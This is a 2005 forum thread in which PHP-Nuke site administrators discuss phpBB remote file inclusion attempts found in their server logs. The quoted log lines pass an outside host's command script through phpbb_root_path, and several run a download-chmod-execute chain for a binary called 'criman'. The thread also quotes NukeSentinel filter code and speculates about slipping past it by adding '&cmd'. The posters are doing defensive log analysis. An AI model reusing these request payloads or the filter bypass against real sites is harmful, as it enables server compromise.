Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
fkelly
Former Moderator in Good Standing


Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

PostPosted: Fri Dec 16, 2005 8:45 am Reply with quote

Just reading my logs this morning and came across the following that sure looks like a hack to me:

Quote:
201.9.103.71 - - [16/Dec/2005:05:21:34 -0800] "GET /v-web/portal/cms//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.phantasmairc.hpgvip.ig.com.br/CMD.txt?&cmd=help


Running Nuke 7.6, patched to 3.1 with Sentinel 2.4.2. Interesting that Sentinel didn't object to this, though this IP only occurred once in my logs so he tried this and went away. Almost looks like an XSS attack? but I'm no expert on this stuff. The IP is from Brazil and it's banned on my site now.

Back to reading my logs ... Smile
 
View user's profile Send private message Visit poster's website
hitwalker
Sells PC To Pay For Divorce


Joined:
Posts: 5661

PostPosted: Fri Dec 16, 2005 8:58 am Reply with quote

yes it is,its the same useless script that kiddies use...
 
View user's profile Send private message
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17086

PostPosted: Fri Dec 16, 2005 1:33 pm Reply with quote

fkelly, just curious as to why you would expect NS to catch this?
 
View user's profile Send private message
fkelly
PostPosted: Fri Dec 16, 2005 3:07 pm Reply with quote

Raven: I didn't analyze it in any depth at the time but I recently posted on the filters that were screening out some Gallery commands (no responses btw) and I recalled some lines of code from NS like:

Code:
if ((stristr($nsnst_const['query_string'], "cmd=") AND !stristr($nsnst_const['query_string'], "&cmd")) OR 

  (stristr($nsnst_const['query_string'], "exec") AND !stristr($nsnst_const['query_string'], "execu")) OR
  stristr($nsnst_const['query_string'],"concat") AND
  !stristr($nsnst_const['query_string'], "../")) {
    block_ip($blocker_row);


so I was thinking that if the string "cmd" was somewhere in the query string (A Get) that t he filters in NS would catch it and ban the IP. Looking more closely at it, there is also a "&cmd" in the string which I suppose would negate the condition and let the query string pass thru. Which raises in my mind the question I brought up in the original post, couldn't a hacker stick the string "&cmd" somewhere in the query string and bypass the edit because of it and still do some damage? I don't pretend to really have an in-depth understanding of how these hacks work but I'm trying to learn.

My post on Gallery and the filters is at:
Only registered users can see links on this board! Get registered or login!
so I won't repeat any more of it here.
 
Raven
PostPosted: Fri Dec 16, 2005 3:24 pm Reply with quote

Try it on your own site and see what happens. Did you get any strange messages?
 
fkelly
PostPosted: Fri Dec 16, 2005 3:52 pm Reply with quote

The Socratic method? LOL but you have a point, I had to dig into the logs again and try some things ...

What I get is a 404 error ... the requested resource cannot be found. Now in the original so-called exploit there is a double slash "//" between "cms" and "modules" in the path and even when I eliminate that I still get a 404 error.

Granting that hitwalker is right and it is some useless kiddie script the issues raised in my original post still remain. Not that they couldn't be similarly disposed of but ...
 
Stray_Bullet
New Member
New Member


Joined: Nov 13, 2004
Posts: 17
Location: New York, USA

PostPosted: Mon Dec 19, 2005 4:42 pm Reply with quote

I had the same problem...
Here's an email I sent to Chatserv...

Subject: just a question...

Thanks for the reply Chatserv!
Here's what I seen in the logs...
Code:


[17/Dec/2005:05:18:40 -0500] - - 195.82.6.3 "GET
/modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http:
//81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%2074
4%20criman;./criman;echo%20YYY;echo|
 HTTP/1.1" "-" 302 498 0
[17/Dec/2005:05:18:41 -0500] - - 195.82.6.3 "GET
/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174
.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20crim
an;./criman;echo%20YYY;echo|
 HTTP/1.1" "-" 302 498 0


Another IP...
Code:


[17/Dec/2005:09:14:57 -0500] - - 81.186.243.2 "GET
/modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http:
//81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%2074
4%20criman;./criman;echo%20YYY;echo|
 HTTP/1.1" "-" 302 498 0
[17/Dec/2005:09:14:58 -0500] - - 81.186.243.2 "GET
/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174
.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20crim
an;./criman;echo%20YYY;echo|
 HTTP/1.1" "-" 302 498 0


Like I said it did not get anywhere but redirected back to the IP that
sent it, but I thought I seen something about
"/modules/Forums/admin/admin_styles.php"!

Thanks again!

--
Stray_Bullet

His reply was...
If you have modules/Forums/admin/admin_styles.php in the server get rid of
it.

He said php-nuke does not use it or something of that sort...

Look here... Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message Visit poster's website
Raven
PostPosted: Mon Dec 19, 2005 5:13 pm Reply with quote

That's an exploit from phpbb v2.0.12 I believe
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©